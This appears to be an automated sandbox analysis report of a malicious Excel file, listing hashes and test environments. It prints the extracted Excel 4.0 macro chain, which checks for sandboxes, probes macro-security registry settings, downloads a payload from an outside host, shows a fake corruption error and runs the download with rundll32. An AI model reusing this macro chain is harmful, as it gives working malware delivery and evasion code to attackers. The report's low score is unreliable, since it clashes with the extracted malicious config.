General
-
Target
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
Size
209KB
-
Sample
200409-41b3rw1bqa
-
MD5
05f0733ab9c8d500e5c8b728b73a359f
-
SHA1
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
SHA256
0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd
-
SHA512
458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829
Static task
static1
Behavioral task
behavioral1
Sample
267a6da880b87fbb3c74e8ef84f469d6795f450c.xls
Resource
win7v200217
Behavioral task
behavioral2
Sample
267a6da880b87fbb3c74e8ef84f469d6795f450c.xls
Resource
win10v200217
Malware Config
Extracted
https://amgdorie.online/avdv42g
-
formulas
=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),) =IF(GET.WORKSPACE(14)<400, CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE)) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5) =WAIT(NOW()+"00:00:03") =FOPEN("c:\users\public\1.reg") =FPOS(R[-1]C, 215) =FREAD(R[-2]C, 255) =FCLOSE(R[-3]C) =FILE.DELETE("c:\users\public\1.reg") =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://amgdorie.online/avdv42g","c:\Users\Public\bug65ef.html",0,0) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\bug65ef.html,DllRegisterServer",0,5) =CLOSE(FALSE) WORKBOOK.HIDE("tBtNRCydwb",TRUE) GOTO(R$0C$18)
Targets
-
-
Target
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
Size
209KB
-
MD5
05f0733ab9c8d500e5c8b728b73a359f
-
SHA1
267a6da880b87fbb3c74e8ef84f469d6795f450c
-
SHA256
0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd
-
SHA512
458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829
Score1/10 -